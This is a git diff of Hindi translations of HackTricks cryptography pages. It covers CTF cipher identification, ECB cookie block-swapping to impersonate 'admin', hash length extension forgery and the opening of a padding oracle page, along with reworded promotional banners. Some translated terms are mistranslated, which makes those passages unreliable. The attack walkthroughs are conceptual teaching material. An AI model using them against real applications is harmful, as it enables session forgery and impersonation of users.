`kLD8iwKsigSalLJ5` -* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] +* **जॉंग22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] * `ayRiIo1gpO+uUc7g` -* **ESAB46** \[] +* **एसएबी46** \[] * `3sHcL2NR8WrT7mhR` -* **MEGAN45** \[] +* **मेगान45** \[] * `kLD8igSXm2KZlwrX` -* **TIGO3FX** \[] +* **टिगो3एफएक्स** \[] * `7AP9mIzdmltYmIP9mWXX` -* **TRIPO5** \[] +* **त्रिपो5** \[] * `UE9vSbnBW6psVzxB` -* **FERON74** \[] +* **फेरोन74** \[] * `PbGkNudxCzaKBm0x` -* **GILA7** \[] +* **गिला7** \[] * `D+nkv8C1qIKMErY1` -* **Citrix CTX1** \[] +* **सिट्रिक्स सीटीएक्स1** \[] * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` -[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 डेड: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) -### हैकराइज़ एक्सएस \[_╫Λ↻├☰┏_] +### हैकराइज़एक्स \[_╫Λ↻├☰┏_] ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मरा हुआ: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मृत: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### मोर्स ``` @@ -176,7 +130,7 @@ ryvkryvkryvkryvkryvkryvkryvk ``` * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) -### ASCII85 +### एएससीआई85 ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` @@ -196,14 +150,14 @@ drnajapajrna ``` ### अफाइन गुप्ताक्षर एन्कोड -पत्र को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ पत्र है) और परिणाम को फिर से पत्र में बदलें +अक्षर को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ अक्षर है) और परिणाम को फिर से अक्षर में बदलें ``` krodfdudfrod ``` ### एसएमएस कोड -**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित दोहरी अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\ -उदाहरण: 2=A, 22=B, 222=C, 3=D...\ +**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा पुनरावृत्त अंकों द्वारा परिभाषित किया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\ +उदाहरण के लिए: 2=A, 22=B, 222=C, 3=D...\ आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे। आप इस कोड को डीकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) @@ -221,21 +175,21 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## संक्षेपण -**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विस्तारित कर सकते हैं। +**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विसंक्षेपित कर सकते हैं। -## सरल क्रिप्टो +## सरल एन्क्रिप्शन ### XOR - ऑटोसॉल्वर * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) -### Bifid +### बिफिड एक कीवर्ड की आवश्यकता है ``` fgaargaamnlunesuneoa ``` -### वीजेनेर +### विजेनेर एक कुंजीशब्द की आवश्यकता है ``` @@ -261,7 +215,7 @@ Key: ### समीर सीक्रेट शेयरिंग -एक रहस्य को X भागों में विभाजित किया जाता है और इसे पुनर्प्राप्त करने के लिए आपको Y भागों की आवश्यकता होती है (_Y <=X_). +एक रहस्य को एक्स भागों में विभाजित किया जाता है और इसे पुनर्प्राप्त करने के लिए आपको व्यक्तिगत भागों की आवश्यकता होती है (_व्यक्तिगत भागों की संख्या <= एक्स_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 @@ -269,27 +223,28 @@ Key: ``` [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) -### OpenSSL brute-force +### OpenSSL ब्रूट-फोर्स * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) -## Tools +## उपकरण * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +AWS हैकिंग सीखें और प्रैक्टिस करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index eb75adab2..cc8a0c95e 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} # ECB -(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक ब्लॉक को साफ पाठ के ब्लॉक से बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि स्पष्ट पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल एक ही कुंजी का उपयोग करके प्रत्येक स्पष्ट पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है। +(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक साफ टेक्स्ट के ब्लॉक को** **साइपरटेक्स्ट के ब्लॉक से** **बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि साफ टेक्स्ट को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल कुंजी का उपयोग करके प्रत्येक साफ टेक्स्ट के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है। ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) @@ -26,19 +27,19 @@ ECB का उपयोग करने के कई सुरक्षा प # सुरक्षा दोष का पता लगाना -कल्पना करें कि आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\ -फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\ -आप पाता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान है, **बराबर** हैं। तब, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**। +कल्पना करें आप किसी एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\ +फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें से दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\ +आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान हैं, **वे बराबर हैं**। तो, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**। -जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** हैं। +जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है। ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। वे **ब्लॉक** जो **विभिन्न** हैं, वे उन ब्लॉक्स हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में कोई आवश्यक भिन्नता)। +यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। **विभिन्न ब्लॉक** वे ब्लॉक हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में आवश्यक भिन्नता)। -अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह **कई उपयोक्ता नाम** उत्पन्न कर सकता है **जिनमें समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए: +अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह बस **कई उपयोक्ता नाम उत्पन्न कर सकता है** जिनमें **समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए: | उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): | | ---------------- | ---------------- | ------------------------- | --------------------------------- | @@ -48,7 +49,7 @@ ECB का उपयोग करने के कई सुरक्षा प | 4 | 4 | 8 | 16 | | 7 | 7 | 14 | 16 | -# सुरक्षा दोष का शोधन +# सुरक्षा कमजोरी का शोषण ## पूरे ब्लॉक हटाना @@ -56,24 +57,24 @@ ECB का उपयोग करने के कई सुरक्षा प ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -हम पहले बनाए गए पैटर्न `\x23U\xE45K\xCB\x21\xC8` को देख सकते हैं जो पिछले उपयोगकर्ता नाम के साथ बनाया गया था जिसमें केवल `a` शामिल था।\ +हम पहले से बनाए गए पैटर्न `\x23U\xE45K\xCB\x21\xC8` को देख सकते हैं जो उस उपयोगकर्ता नाम के साथ बनाया गया था जिसमें केवल `a` था।\ फिर, आप पहले 8B ब्लॉक को हटा सकते हैं और आपको उपयोगकर्ता नाम `admin` के लिए एक मान्य कुकी मिलेगी: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -## ब्लॉक्स को हटाना +## ब्लॉकों को हटाना कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_ -इसलिए, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है: +तो, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है: -* एक उपयोगकर्ता नाम जेनरेट करें जो: `len() + len(` 2 ब्लॉक्स को जेनरेट करेगा। -* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता नाम और रिक्त स्थानों को भरेगा, जिसे हम अनुकरण करना चाहते हैं, जैसे: `admin ` +* एक उपयोगकर्ता नाम जेनरेट करें जो: `len() + len(` 2 ब्लॉक्स को उत्पन्न करेगा। +* फिर, एक पासवर्ड जेनरेट करें जो उसी संख्या के ब्लॉक्स को भरेगा जिसमें हम उपनामित करना चाहते हैं और रिक्त स्थान हों, जैसे: `admin ` -इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता नाम का नकली है): `username |admin ` +इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता का नाम बना रहेगा): `username |admin ` -** फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`** +**फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और आप उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`** -# संदर्भ +## संदर्भ * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 6769833f8..e08f5cece 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,42 +1,43 @@ +{% hint style="success" %} +**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
+{% endhint %} # हमले का सारांश -एक सर्वर की कलर टेक्स्ट डेटा के साथ कुछ गुप्त से जोड़कर उस डेटा का हैश बनाता है। यदि आप जानते हैं: +एक सर्वर की कलर टेक्स्ट डेटा के साथ कुछ गोपनीय जोड़कर उस डेटा को हैश कर रहा है। यदि आप जानते हैं: -* **गुप्त की लंबाई** (यह एक दी गई लंबाई सीमा से भी bruteforced किया जा सकता है) +* **गोपनीय की लंबाई** (यह दी गई लंबाई सीमा से भी ब्रूटफोर्स किया जा सकता है) * **स्पष्ट पाठ डेटा** -* **एल्गोरिथ्म (और यह हमले के लिए वंर्नरबल है)** +* **एल्गोरिथ्म (और यह हमले के लिए वंशानुक्रमित है)** * **पैडिंग ज्ञात है** * आम तौर पर एक डिफ़ॉल्ट प्रयोग होता है, इसलिए अगर अन्य 3 आवश्यकताएं पूरी होती हैं, तो यह भी होता है -* पैडिंग गुप्त+डेटा की लंबाई पर निर्भर होता है, इसलिए गुप्त की लंबाई की आवश्यकता है +* पैडिंग गोपनीय+डेटा की लंबाई पर निर्भर होता है, इसलिए गोपनीय की लंबाई की आवश्यकता है तो, एक **हमलावर** के लिए संभव है कि वह **डेटा** को **जोड़ सकता है** और **पिछले डेटा + जोड़े गए डेटा** के लिए एक मान्य **सिग्नेचर** उत्पन्न कर सकता है। ## कैसे? -मूल रूप से वंर्नरबल एल्गोरिथ्म पहले **डेटा ब्लॉक का हैश बनाते हैं**, और फिर, **पहले** बनाए गए **हैश** (स्थिति) से, वे **अगले डेटा ब्लॉक को जोड़ते हैं** और **उसे हैश करते हैं**। +मूल रूप से, वंशानुक्रमित एल्गोरिथ्म पहले **डेटा ब्लॉक को हैश** करके हैश उत्पन्न करते हैं, और फिर, **पिछले** बनाए गए **हैश** (स्थिति) से, वे **अगले डेटा ब्लॉक को जोड़ते हैं** और **हैश** करते हैं। -फिर, यहां सोचें कि गुप्त "गुप्त" है और डेटा "डेटा" है, "गुप्तडेटा" का MD5 6036708eba0d11f6ef52ad44e8b74d5b है।\ +फिर, यहां यह विचार करें कि गोपनीय "गोपनीय" है और डेटा "डेटा" है, "गोपनीयडेटा" का MD5 6036708eba0d11f6ef52ad44e8b74d5b है।\ यदि एक हमलावर "जोड़ना" स्ट्रिंग जोड़ना चाहता है तो वह: -* 64 "A" का MD5 उत्पन्न करें -* पहले इनिशियलाइज़ हैश की स्थिति को 6036708eba0d11f6ef52ad44e8b74d5b पर बदलें +* 64 "ए" का MD5 उत्पन्न करें +* पहले से ही आरंभित हैश की स्थिति को 6036708eba0d11f6ef52ad44e8b74d5b पर बदलें * स्ट्रिंग "जोड़ना" जोड़ें -* हैश समाप्त करें और परिणामी हैश "गुप्त" + "डेटा" + "पैडिंग" + "जोड़ना" के लिए **मान्य होगा** +* हैश समाप्त करें और परिणामी हैश "गोपनीय" + "डेटा" + "पैडिंग" + "जोड़ना" के लिए एक **मान्य** होगा** ## **उपकरण** @@ -44,19 +45,20 @@ HackTricks का समर्थन करने के अन्य तरी ## संदर्भ -आप इस हमले को [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) में अच्छी तरह से समझ सकते हैं +आप इस हमले को अच्छी तरह से समझ सकते हैं [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +{% hint style="success" %} +**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
+{% endhint %} diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 51f10310c..cabb3e8e3 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,55 +1,56 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें** और **PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
